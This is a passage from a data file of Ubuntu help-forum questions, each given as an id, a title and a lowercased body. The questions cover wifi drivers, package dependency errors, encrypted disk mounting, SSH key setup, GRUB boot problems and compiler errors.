309095	kubuntu 12.04 is stuck in a login loop	i have an acer aspire 5830tg laptop dual booting with windows 7 and kubuntu 12.04 . i was trying to install some packages , and while doing so i got the following error message : could not get lock /var/lib/dpkg/lock i then ran a command to unlock it . my screen blanked out , so i restarted the system using the power button . when i try to login i get a black screen that looks like a console , and after a second i go back to the login prompt . i found that kdm is not installed . i can login through command line by pressing ctrl+alt+f3 at the login . now my problem is how to install kdm since i can not connect to wifi or anything .
309100	ntfs partition input/output after using testdisk	i used testdisk to recover my partition . but after a successful recovery it prompted to restart the computer which i did . but then after restarting the ntfs partition has input/output errors . i can access some of the folders and file but others disappeared . i was given the option of ntfsfix but it failed . it gives me the message below : mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . checking file system overflow ... failed error : failed to fix the alternate boot sector
309101	how to install mp3 plugin ?	i just installed ubuntu desktop 13.04 in my computer , dual boot with windows 7 . how to install mp3 plugin ? because i want to listen to music and watch movie , but the player requires plugin ? how to solve this problem ?
309108	how to make installation packages `` trusted '' ?	i tried to install skype on ubuntu 13.04 . it showed up in the software center fine , but when i tried to install skype , it said that it would require the the installation of untrusted packages . is there any way to work past that ?
309111	wine install error ubuntu 12.04.1 32-bit	when i try to install wine through terminal , it throws the error : nits @ nits-desktop : ~ $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed wine1.6-i386 : depends : wine1.6 ( = 1.6~rc2-0ubuntu1~ppa1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . then trying to fix broken packages it shows : nits @ nits-desktop : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : wine1.6 suggested packages : dosbox the following new packages will be installed : wine1.6 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/1,160 kb of archives . after this operation , 3,047 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 301229 files and directories currently installed . ) unpacking wine1.6 ( from ... /wine1.6_1.6~rc2-0ubuntu1~ppa1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/wine1.6_1.6~rc2-0ubuntu1~ppa1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/wine ' , which is also in package wine1.6-i386 1.6~rc2-0ubuntu1~ppa1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ... processing triggers for hicolor-icon-theme ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : /var/cache/apt/archives/wine1.6_1.6~rc2-0ubuntu1~ppa1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am also not able to remove broken packages . what to do ? i have tried many solutions available on this topic but none of them is working . winetricks is installed , it would n't work without wine
309113	what is the difference between dpkg and aptitude/apt-get ?	when installing a software via dpkg -i packagea.deb , will the dependencies required by packagea be downloaded and installed automatically ? how is this different from using apt-get or aptitude ?
309114	wifi keeps disconnecting on lenovo g480	i 'm using lenovo g480 and i just installed ubuntu 12.04 lts yesterday ( dual booting it with windows 7 ) . my wifi connection keeps on connecting and disconnecting every 5 to 10mins . i 'm a newbie to linux and i have no idea how to fix this . can someone help ? lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev a1 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 04:00.0 ethernet controller : atheros communications inc. ar8162 fast ethernet ( rev 10 ) sudo lshw -c network *-network description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : eb500000-eb503fff *-network description : ethernet interface product : ar8162 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 10 serial : 3c:97:0e:19 : f2 : bf capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:19 memory : eb400000-eb43ffff ioport:2000 ( size=128 ) *-network description : wireless interface physical id : 3 logical name : wlan0 serial : 08 : ed : b9 : a5:9b : a1 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.5.0-34-generic firmware=n/a ip=192.168.254.101 link=yes multicast=yes wireless=ieee 802.11bgn lsmod : module size used by nls_utf8 12558 1 isofs 40307 1 snd_hda_codec_hdmi 32476 1 snd_hda_codec_realtek 79855 1 joydev 17694 0 rfcomm 47562 0 bnep 18240 2 parport_pc 32867 0 ppdev 17114 0 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp coretemp 13642 0 kvm 422160 0 ghash_clmulni_intel 13221 0 arc4 12530 2 aesni_intel 51134 2 cryptd 20531 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel brcmsmac 541775 0 mac80211 555272 1 brcmsmac brcmutil 14756 1 brcmsmac cfg80211 208382 2 brcmsmac , mac80211 cordic 12575 1 brcmsmac snd_hda_intel 34063 3 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq btusb 22432 0 bluetooth 211812 14 rfcomm , bnep , btusb alx 73500 0 uvcvideo 78117 0 mdio 13808 1 alx videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc microcode 23030 0 snd 83674 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 102506 0 serio_raw 13216 0 lpc_ich 17145 0 bcma 35762 1 brcmsmac mei 41410 0 ideapad_laptop 18235 0 soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm sparse_keymap 13891 1 ideapad_laptop nouveau 924024 1 ttm 88495 1 nouveau mxm_wmi 13022 1 nouveau mac_hid 13254 0 wmi 19257 2 nouveau , mxm_wmi i915 535221 3 drm_kms_helper 49259 2 nouveau , i915 drm 290059 7 nouveau , ttm , i915 , drm_kms_helper i2c_algo_bit 13565 2 nouveau , i915 video 19653 2 nouveau , i915 usb_storage 49288 0 ahci 25869 2 libahci 27338 1 ahci thanks . your help would be greatly appreciated . god bless : )
309116	installing apache httpd server on ubuntu 12.04	i have 5 systems running apache tomcat server , for load balancing i need to install apache httpd server , how should i do this , please provide me some useful links and your opinions on this , thanks
309120	wifi disabled by hardware switch , but hardware switch does n't help	running ubuntu 13.04 , i have a problem with my wifi . when booting after a proper shut down , there 's never any wifi connection . the system states wifi is disabled by hardware switch however , pressing the hardware switch does n't change anything . the only workaround i have is to plug in an ethernet cable , wait for connection , then remove it . now , a wifi connection can be established . the hardware button now functions as expected . this is of course very annoying . first , the wifi should n't been disabled if it was n't before the last shut down . second , it should be capable of turning it on by pressing the button which is supposedly turned off . third , it should n't magically flip the button through the wonderful presence of an ethernet cable . and as a bonus : it would be nice to have the state of the wifi button displayed with the little led next to the wifi button ( which it did on ubuntu 12.04 and every other decent operating system i ran so far ) . the hardware i 'm working with is a broadcom bcm4313 802.11b/g/n wireless lan controller . now of course i tried to enable the proprietary driver for this wifi controller , but it still has issues : after a proper boot , wifi is not connecting , not ever . disabling the currently active ( with led correctly indicating the status , woohoo ! ) wifi via hardware button and turning it on again , does not change anything . the only workaround is -- again -- plugging in an ethernet cable and removing it . well i do n't always have an ethernet cable with me , i 'm not always at home and afaik i also need something on the other side of the cable otherwise it 's not even detected , so this just is n't a solution . is there a proper fix for this ? otherwise , is there a software way to trick ubuntu into thinking that a wired connection has been made ?
309122	removing ubuntu one	as it says in the title . i want to get rid of this useless application ubuntu one . i 've removed the application files from the software centre , but the icon is still shown .
309124	mount lvm encrypted partition on external hdd - device /dev/sdc5 is not a valid luks device	recently , my ubuntu server was unable to boot on my 500go hdd i removed the hdd from my server case , put it in an external case , and connected it via usb to an ubuntu laptop . i have ssh access on this ubuntu laptop . i can see the boot partition of the server hdd here : poste3 @ poste3 : /media $ df -h /dev/sdc1 228m 27m 189m 13 % /media/poste3/695e74fd-83bb-4489-bf3b-51d256885fc9 i can list the content of this partition : poste3 @ poste3 : /media/poste3/695e74fd-83bb-4489-bf3b-51d256885fc9 $ ls abi-3.2.0-38-generic memtest86+.bin config-3.2.0-38-generic memtest86+_multiboot.bin grub system.map-3.2.0-38-generic initrd.img-3.2.0-38-generic vmlinuz-3.2.0-38-generic lost+found so it means that the disk is still readable , even with some defected sectors . when i installed ubuntu server on this hdd , i remember i choose use entire disk and set up encrypted lvm . root @ poste3 : /home/poste3 # fdisk -l /dev/sdc disk /dev/sdc : 500.1 gb , 500106779648 bytes 255 têtes , 63 secteurs/piste , 60801 cylindres , total 976771054 secteurs unités = secteurs de 1 * 512 = 512 octets taille de secteur ( logique / physique ) : 512 octets / 512 octets taille d'e/s ( minimale / optimale ) : 512 octets / 512 octets identifiant de disque : 0x000d3d72 périphérique amorce début fin blocs id système /dev/sdc1 * 2048 499711 248832 83 linux /dev/sdc2 501758 976769023 488133633 5 étendue /dev/sdc5 501760 976769023 488133632 8e lvm linux so i did the following : sudo apt-get install lvm2 cryptsetup sudo modprobe dm-crypt cryptsetup luksopen /dev/sdc5 crypt device /dev/sdc5 is not a valid luks device . can you help me to mount this partition ? i do n't understand why it fails ... is it because physical defects in the disk ? thanks
309125	access mtpfs on the fly from any application	i have a samsung galaxy s2 witch i want to use to store some sensitive data . i am using the application eds lite to store encrypted files in a container , that can be mounted by the truecrypt application . the phone is recognized by ubuntu but i ca n't use truecrypt to access the files directly on the device . i understand that that is caused by the mtpfs which is a pull and push file system . is there any way i can use truecrypt directly with the device without copying the container to my drive encrypting a file and the replacing the old file ? thank you !
309133	xbmc lubuntu quantal	i have a mac mini g4 with ubuntu 12.0 with kernel : -version- : linux 3.5.0-17-powerpc-smp ( ppc ) . now i want to get xbmc but i cant get it installed , i have tried many things but it wo n't work : examples : sudo apt-get install xbmc i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xbmc : depends : xbmc-bin ( > = 3:12.2-1~ppa1~quantal ) but it is not installable depends : xbmc-bin ( < 3:12.2-1~ppa1~quantal.1~ ) but it is not installable e : unable to correct problems , you have held broken packages . with the software center i get this : the following packages have unmet dependencies : xbmc : depends : xbmc-bin ( > = 3:12.2-1~ppa1~quantal ) but it is not going to be installed depends : xbmc-bin ( < 3:12.2-1~ppa1~quantal.1~ ) but it is not going to be installed also tried this : sudo apt-get install python-software-properties pkg-config en i have tried the ppa renniewaldoc , wsnipex , but it wont work for me . can someone help me to get xbmc ? greetz , sjoerd
309134	g++ error `` sstream.tcc:112:39 : error : expected unqualified-id before ‘ ( ’ token ''	i tried to install install one program at ubuntu and it uses main.cpp .i dont know why but it gives always error . ( main.cpp syntax correct 100 % ) and this program works without error @ mac system but not ubuntu.i couldnt know to how to fix it.please can you help that issue ? g++ version : g++ ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 error below : g++ -o2 -g -wall -fmessage-length=0 -i/usr/include/mysql -c -o main.o main.cpp in file included from /usr/include/c++/4.6/sstream:580:0 , from /usr/local/include/glog/logging.h:44 , from main.cpp:13 : /usr/include/c++/4.6/bits/sstream.tcc : in member function ‘virtual std : :basic_stringbuf < _chart , _traits , _alloc > : :int_type std : :basic_stringbuf < _chart , _traits , _alloc > : :overflow ( std : :basic_stringbuf < _chart , _traits , _alloc > : :int_type ) ’ : /usr/include/c++/4.6/bits/sstream.tcc:112:39 : error : expected unqualified-id before ‘ ( ’ token /usr/include/c++/4.6/bits/sstream.tcc:114:35 : error : expected unqualified-id before ‘ ( ’ token make : *** [ main.o ] error 1
309135	( s ) mplayer with smb sometimes hangs , ca n't be killed , only reboot works	i 'm using a raspberry pi as a nas , serving video over smb ( sshfs made it skip too much , nfs i never got working ) . i prefer to watch movies with smplayer , from my xubuntu laptop ( opening the smb share in thunar ) . it works fine most of the time , but once in a while ( not sure what causes it ) , smplayer will hang . i can quit the window , but the two smplayer processes still exist ( one of them ) , it wo n't start a new window , and kill ( even kill -9 ) does n't remove the processes . i can play the file with parole , but the only way i can get smplayer to play it again is to reboot . i 'm guessing this means ( s ) mplayer is in 'uninterruptible sleep ' due to some hickup with serving the file over the network , but how do i work around this ? all networks have hickups some times , is there really a situation in linux where the only solution is a reboot ? edit : seems like yes , if the parent process is 1 , the only safe method is a reboot . but is there a way to stop it from going defunct in the first place ?
309138	vmware workstation 9.0.2 for linux build 1031769 . failed to execute child process `` @ @ binary @ @ ''	i got the error after installing vmware workstation 9.0.2 . here is the output the uname -a command . linux dmitriev-pc 3.5.0-34-generic # 55~precise1-ubuntu smp fri jun 7 16:25:50 utc 2013 x86_64 x86_64 x86_64 gnu/linux ubuntu version is ubuntu 12.04.2 lts . did anybody manage to solve it ? the sole advice i read was to reinstall vmware workstation but it did n't work for me . edit # 1 . /etc/vmware-installer/components/vmware-workstation/9.0.2/vmware-workstation.py : self.runcommand ( 'sed ' , '-e ' , 's , @ @ binary @ @ , % s , g ' % binary , '-i ' , launcher ) binary file /etc/vmware-installer/components/vmware-workstation/9.0.2/vmware-workstation.pyc matches /etc/vmware-installer/components/vmware-network-editor-ui/9.0.2/vmware-network-editor-ui.py : self.runcommand ( 'sed ' , '-e ' , 's , @ @ binary @ @ , % s , g ' % binary , '-i ' , launcher ) binary file /etc/vmware-installer/components/vmware-network-editor-ui/9.0.2/vmware-network-editor-ui.pyc matches binary file /etc/vmware-installer/components/vmware-player-app/5.0.2/vmware-player-app.pyc matches /etc/vmware-installer/components/vmware-player-app/5.0.2/vmware-player-app.py : self.runcommand ( 'sed ' , '-e ' , 's , @ @ binary @ @ , % s , g ' % binary , '-i ' , launcher ) solved there is a strange suffix % f in the /usr/share/applications/vmware-workstation.desktop file . i did n't find what it could mean on the man vmware man page . exec=/usr/bin/vmware % f if i run vmware via my command line , it runs with no errors .
309141	can not install : dual boot win 8 its a different problem i dont have any uefi/secure boot	i have acre aspire 4752 ,2gb ram , i3 2330m , 64 bit and win 8 pro , i have none of the secure boot issues and my live usb is working perfectly i am using that while typing it but when i choose dual boot with windows option and proceed to install the system just reboots with no message/error/warning . model : ata st9500325as ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 106mb 107gb 107gb primary ntfs boot 2 107gb 215gb 107gb primary ntfs 3 215gb 366gb 151gb primary ntfs 4 366gb 500gb 134gb primary ntfs model : sony storage media ( scsi ) disk /dev/sdb : 8100mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 8100mb 8100mb primary fat32 boot , lba i want to install ubuntu on 4th drive only as it is completely free . again i want dual boot and the windows is on the 1st drive . fyi i used the pendrive live usb creator ( one whose link is provided in the ubuntu installation page ) and i have checked the hashsum and also i have re-mounted the .iso file 3 times already using 3 different pen-drives
309151	what is hammering the cpu when top is not running ?	on kubuntu 12.10 i can see with the kde system monitor plasmoid that the cpu usage is fluctuating between 60 % - 90 % on both cores . as soon as i open top it goes down to 3 % - 10 % . i thought that the issue is that i 'm 'doing nothing ' while looking at top , so i closed top ( just pressed q ) and still did nothing with the keyboard nor mouse . however the cpu usage jumps back up to where it was . what might be smart enough to calm down while top is running ?
309154	how did i uninstall kde in 13.04 ?	i wanted to uninstall kde-standard package ( not confused with kubuntu-desktop ) and all of kde-related packages in 13.04 . seems lightdm shows too many desktops ( because i installed lot of des ) so unity desktop selection gone off-screen . my selection is to uninstalls one of des i have . what should i do ?
309166	unable to upgrade ubuntu due to unmet dependencies	i am trying to upgrade ubuntu server , but get the following error message : the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.44.53 ) but 3.2.0.48.58 is installed e : unmet dependencies . try using -f. the currently used kernel : 3.2.0-43-generic system amd64 would appreciate assistance in this matter , i think this started when the /boot area went full , i have cleared some space there now .
309170	how to add path ?	i am trying to complete the installation for some software . according to which i have to add path . i am not getting it how to do that . please guide me how to do the following steps . add the path to rpa/tk headers : -i/usr/include/rpatk to link to the rpa/tk libraries on linux add the following link options : -lrpa -lrvm -lrex -lrlib -lm rvm library uses some math functions from the system math library , that is why you must include '-lm ' to include the math library to your project in addition to the rpa/tk built libraries : librpa librex librvm librlib http : //www.rpasearch.com/rpatk/doc/doxygen/rpadoc/html/rpatk_build.html
309172	system crash while disconnecting mobile internet from laptop via bluetooth	i am using ubuntu 13.04 . while i was disconnecting my laptop of the mobile internet via turning the bluetooth off , my system was just crashed . the terminal behind the gui ( virtual terminal ) was seen along with some massages.. i 'd waited for some minutes , but nothing happened thereafter . the problem also arises while turing the bluetooth of the mobile device off . will anyone please help me to gid of this problem ?
309173	ethernet connection drops intermittently in ubuntu 13.04	during the last couple of days , i have noticed that my ethernet connection drops about once every 5 minutes . the connection has worked for a number of years without problems before that . i am running a 64-bit ubuntu 13.04 . the ethernet controller is a realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 01 ) . this is the output from lscpi -v : 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 01 ) subsystem : gigabyte technology co. , ltd motherboard flags : bus master , fast devsel , latency 0 , irq 44 i/o ports at c000 [ size=256 ] memory at f9000000 ( 64-bit , non-prefetchable ) [ size=4k ] [ virtual ] expansion rom at fa800000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : r8169
309174	how to set up sshd to allow login using public key authentication ?	i 've been trying to set my vps to use ssh keys for login instead of password . i 've been reading tutorial after tutorial on how to set this up but i just ca n't set it up right . so what i have done so far is the following ssh-keygen -t rsa -b 4096 your identification has been saved in /root/.ssh/id_rsa . your public key has been saved in /root/.ssh/id_rsa.pub . the key fingerprint is : af:3a : f2:75:5f : c2:67 : c8 : ad:1d:0a : ab root @ localhost copied public key into authorized_keys cp root/.ssh/id_rsa.pub /root/.ssh/authorized_keys the issue is , how do i login via this key ? do i save the private key on notepad ? because if ssh key logs me in via ip , i do n't think i can login because my ip is dynamic . can someone help me ?
309177	execute terminal command without opening terminal	in terminal , i have an alias so that when i type note , a text document of my notes comes up . often times when i 'm browsing the web i 'd like to make a quick note but i do n't have terminal open , so i have to shift-alt-t to open terminal and then type `note ' . and then i have to click off the terminal . is there anyway to access terminal commands without opening the terminal so i do n't have to do so many key presses ? maybe through a lens or hud ? alt-note would be really nice.. i know i could map terminal to alt , but then i 'd still have to click off it .
309178	ask to install program after `` the program 'x ' is currently not installed ''	if you try to execute a program that is not installed you will get a message the program 'x ' is currently not installed . you can install it by typing : sudo apt-get install x and instead of offering you to install the program for you , you have to type the actual command . how can this behavior be changed ?
309180	launcher for a program not working - ubuntu 13.04	i 'm using a program named `` robomongo '' ( a mongodb ui ) , but to run it i need to type in the terminal `` ./robomongo.sh '' . i tried to add the file ~/.local/share/applications/robomongo.desktop like this : [ desktop entry ] version=1.0 type=application name=robo-mongo comment=robomongo exec=/opt/robo/robomongo.sh terminal=flase categories=application ; and it 's still not working from the dash . ( i can see the app in the dash when i start typing robo , but it 's not doing anyhting ) . please guide me , thanks a lot .
309183	new to ubuntu and ca n't connect to wifi	i 'm pretty much brand new to using ubuntu and for the life of me i ca n't figure out how to connect to my wifi network . i have no idea what kind of information i should post . browsing other similar questions has been confusing and hectic , and i have no idea what kind of information will be needed to fix this . the computer itself is an imac4,1
309186	firefox is sending malformed requests	its weeks now i 'm experience same 400 error . i had never had it before . i tried safe mode with no extensions but nope , i get same error . i do n't know what to do anymore . searched web as well as au with no success . i need any advice to get me fine . switching to chromium/chrome is not an option for me as have been for many years ( since early life of ff ) and so i 'm not only used to it but loves it . here is my system ubuntu 13.04 unity 7.0.0 firefox 21.0
309187	how can i improve my boot time ?	i have horribly long boot time . i installed e4rat ( done everything according to tutorial : http : //rafalcieslak.wordpress.com/2013/03/17/e4rat-decreasing-bootup-time-on-hdd-drives/ ) but it actually has n't decreased the time . i tried to remove unnecessary services but i have no idea what to do now . i think 1:15 minutes is to long , i expect at least 30 sec . here is my bootchart : http : //i.stack.imgur.com/a2slt.png
309188	can not read/burn cd-r disks	i can not read cd-r disks with data on and have an error in brasero when i try to burn cd-r disks . all other disks work fine including cd-rw . is there a problem i can fix before i try buying a new drive ? thanks .
309189	how can i install php 5.5 in ubuntu	how can i replace 5.3 with php 5.5 un ubuntu.i tried in google and failed to find repository . please help me
309190	when ubuntu boots i get a black screen after bios but before login , no fsck shows up	: ) i am not sure if i have a real system issue here but as a freshly lubuntu noob i am wondering a lot now my medion notebook just boots fine , at first there comes the bios and `` memory checking '' window from where i could go to the bios , all fine then the screen becomes black , but the notebook seems still booting then after some long seconds the lubuntu ( i use 13.04 , 99,99 % out of the box because everything works just fine = ) `` loading screen '' appears , then comes the login screen and i can start it i am just wondering : is that an issue ? because i am not able to see any message from fsck even if i force it to start on next boot lspci -nnk | grep -i `` vga\|3d '' -a2 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 915gm/gms/910gml express graphics controller [ 8086:2592 ] ( rev 03 ) subsystem : wistron corp. device [ 17c0:2071 ] kernel driver in use : i915 thats my internal graphics thanks guys for any hints ! : )
309191	ca n't find phpstorm	i am new , never used ubuntu until yesterday , so i 'm not really into it , yet . i installed phpstorm from jetbrains , but i ca n't find it anywhere , i need to run it . i searched /usr/share/applications as suggested in another post , but again , no success . please give a helping hand . any terminal command or help with the location i could find it and make a shortcut on the desktop would be appreciated .
309193	grub not launching	when i start up my machine it does not go into the boot loader instead i get a black screen which displays this : intel undi , pxe-2.0 ( build 083 ) copyright ( c ) 1997-2000 intel corporation for atheros pcie ethernet controller v2.1.1.1 ( 12/23/11 ) client mac addr : 4c 72 b9 d5 1e 94 guid : aca2676d-df96-64of-67e8-829649e6f1ff pxe-e53 : no boot filename received pxe-mof : exiting intel pxe rom error : no boot disk has been detected or the disk has failed . if i go into the bios 's boot options these are what 's listen : uefi boot sources windows boot manager legacy boot sources atapi cd/dvd drive sata2 hard drive sata0 network controller ( atheros boot agent ) i have tried booting from `` windows boot manager '' and `` sata0 '' but they both present me with that same screen . i can launch into my liveusb just fine , i have checked the partitions in gparted and this is what they look like : partition | file system | size | used | unused | flags /dev/sda2 | unknown | 200.00mib | -- - | -- - | bios_grub /dev/sda1 | ext4 | 676.94gib | 12.86mib | 664.67mib | -- - /dev/sda3 | linux-swap | 7.94gib | -- - | -- - | -- - /dev/sda4 | ntfs | 246.44gib | 28.32gib | 218.12gib | -- - i have absolutely no idea why this is happening , i installed 12.04lts the same as i have all my other systems the only differences are that : the nic is newer than 12.04 so the drivers are n't their out of the box . i 'm installing it along side windows 8 here 's answers to questions i expect to be asked and things i have tried . did you install windows first ? yes . have you tried boot-repair ? as i can not connect to the internet i can not run boot-repair . i made a boot-repair-disk and tried that but it was complaining about not having internet and did not work . have you tried reinstalling grub ? yes . i tried reinstalling grub from the liveusb and from chroot on the linux partition , neither worked . have you tried single booting ? yes . single booting works . i can run either os separately but now that i have tried dual booting the machine ( which is a requirement as this is my dev machine and i need to test the software on both linux and windows ) . have you tried 13.04 ? yes . i made a 13.04 liveusb , that had the drivers for the nic but would n't let me connect to the internet through my work 's proxy . any help is appreciated , i am desperate now as i can not work without this machine being functional . what is the pc specs ? the full specs can be found here : http : //uk.hardware.info/productinfo/156175/hp-elite-7500-mt-b5g34ea # tab : overview edit i took the hard drive home and put it in my machine and grub launches just fine ? ( i get the grub rescue prompt but it 's more than i get on the work machine )
309194	my tool bar has disappeared	my tool bar at the top of the desktop have disappeared . to be honest it gave an error and when i clicked the error it it disappeared , now i want to get it back . what should i do ? ! i went to ubuntu software center but i could n't do anything . this is a picture of my desktop
309195	cmath : no such file or directory # include < cmath >	i downloaded and try to installed the package `` wfconvert '' from this link http : //qmcpack.cmscc.org/tutorials/bulk-solid . but i got some error . here what i did : copy the wfconvert folder in root `` / '' cd /wfconvert/build/ root @ geant4 : /wfconvert/build # cmake .. -- current revision : 65 modified on 2013-01-16 22:14:53 +0330 ( wed , 16 jan 2013 ) -- found mpi.h and libraries . check for working mpi compiler -- mpi is disabled -- failed to link lapack , blas , atlas libraries with environments . going to search standard paths . -- lapack_libraries=/usr/lib/liblapack.so -- blas_libraries=/usr/lib/libblas.so -- cxx compiler flags : -g -o3 -ftemplate-depth-60 -drestrict=__restrict__ -funroll-all-loops -finline-limit=1000 -wno-deprecated -mmmx -msse -msse2 -msse3 -fopenmp -- cc compiler flags : -o3 -drestrict=__restrict__ -funroll-all-loops -finline-limit=1000 -std=gnu99 -fomit-frame-pointer -mmmx -msse -msse2 -msse3 -- libxml2_include_dir=/usr/include/libxml2 -- libxml2_libraries=/usr/lib/libxml2.so -- hdf5_include_dir=/usr/include -- hdf5_libraries=/usr/lib/libhdf5.so -- fftw_include_dir=/usr/include -- fftw_libraries=/usr/lib/libfftw3.so -- ready to build qmcpack -- configuring done -- generating done -- build files have been written to : /wfconvert/build make command root @ geant4 : /wfconvert/build # make [ 1 % ] building c object src/einspline/cmakefiles/einspline.dir/bspline_create.c.o in file included from /wfconvert/src/einspline/bspline_base.h:24:0 , from /wfconvert/src/einspline/bspline_create.h:24 , from /wfconvert/src/einspline/bspline_create.c:21 : /wfconvert/build/src/common/config.h:65:17 : fatal error : cmath : no such file or directory # include < cmath > ^ compilation terminated . make [ 2 ] : *** [ src/einspline/cmakefiles/einspline.dir/bspline_create.c.o ] error 1 make [ 1 ] : *** [ src/einspline/cmakefiles/einspline.dir/all ] error 2 make : *** [ all ] error 2 i don`t know what to do ! here is my cmath file list : root @ geant4 : / # find -name cmath ./opt/root5.32.00/cint/cint/include/cmath ./app/gcc/4.8.0/include/c++/4.8.0/ext/cmath ./app/gcc/4.8.0/include/c++/4.8.0/cmath ./app/gcc/4.8.0/include/c++/4.8.0/tr1/cmath ./usr/include/boost/compatibility/cpp_c_headers/cmath ./usr/include/boost/tr1/tr1/cmath ./usr/include/c++/4.5/cmath ./usr/include/c++/4.5/tr1_impl/cmath ./usr/include/c++/4.5/tr1/cmath ./usr/include/c++/4.6/cmath ./usr/include/c++/4.6/tr1/cmath ./usr/share/gccxml-0.9/gcc/2.95/cmath ./gcc-build/gcc-4.8.0/stage1-i686-pc-linux-gnu/libstdc++-v3/include/ext/cmath ./gcc-build/gcc-4.8.0/stage1-i686-pc-linux-gnu/libstdc++-v3/include/cmath ./gcc-build/gcc-4.8.0/stage1-i686-pc-linux-gnu/libstdc++-v3/include/tr1/cmath ./gcc-build/gcc-4.8.0/i686-pc-linux-gnu/libstdc++-v3/include/ext/cmath ./gcc-build/gcc-4.8.0/i686-pc-linux-gnu/libstdc++-v3/include/cmath ./gcc-build/gcc-4.8.0/i686-pc-linux-gnu/libstdc++-v3/include/tr1/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/include/ext/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/include/c/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/include/c_global/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/include/c_std/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/include/tr1/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/testsuite/26_numerics/headers/cmath ./gcc-build/gcc-4.8.0/libstdc++-v3/testsuite/tr1/8_c_compatibility/cmath ./gcc-build/gcc-4.8.0/prev-i686-pc-linux-gnu/libstdc++-v3/include/ext/cmath ./gcc-build/gcc-4.8.0/prev-i686-pc-linux-gnu/libstdc++-v3/include/cmath ./gcc-build/gcc-4.8.0/prev-i686-pc-linux-gnu/libstdc++-v3/include/tr1/cmath and root @ geant4 : / # uname 